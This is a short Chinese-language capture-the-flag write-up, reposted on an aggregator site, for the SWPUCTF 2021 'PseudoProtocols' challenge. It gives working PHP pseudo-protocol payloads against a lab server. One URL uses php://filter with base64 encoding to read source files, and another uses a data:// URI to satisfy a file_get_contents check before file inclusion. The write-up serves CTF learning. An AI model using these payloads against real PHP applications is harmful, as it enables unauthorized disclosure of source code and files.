微信公众号搜"智元新知"关注
微信扫一扫可直接关注哦!

[SWPUCTF 2021 新生赛]PseudoProtocols

 

看网址,里面有一个wllm=  这个我们可以再根据下面的提示,利用PHP伪协议;

http://1.14.71.254:28685/index.PHP?wllm=PHP://filter/read=convert.base64-encode/resource=hint.PHP

 

 将得到的数base64;

 

 得到提示,让我们去访问/test2222222222222.PHP

 

 就看到一堆的代码;a参数就是利用file_get_contents()函数只读形式打开,让它打开后内容要与"I want flag"字符串一样,才能继续执行下面的文件包含$file参数。再利用PHP伪协议中的data://协议。

 

 

http://1.14.71.254:28685/test2222222222222.PHP?a=data://text/plain;base64,SSB3YW50IGZsYWc=

 

 拿到flag

这个主要是利用了PHP伪协议;

周五摸摸鱼~~

版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。

相关推荐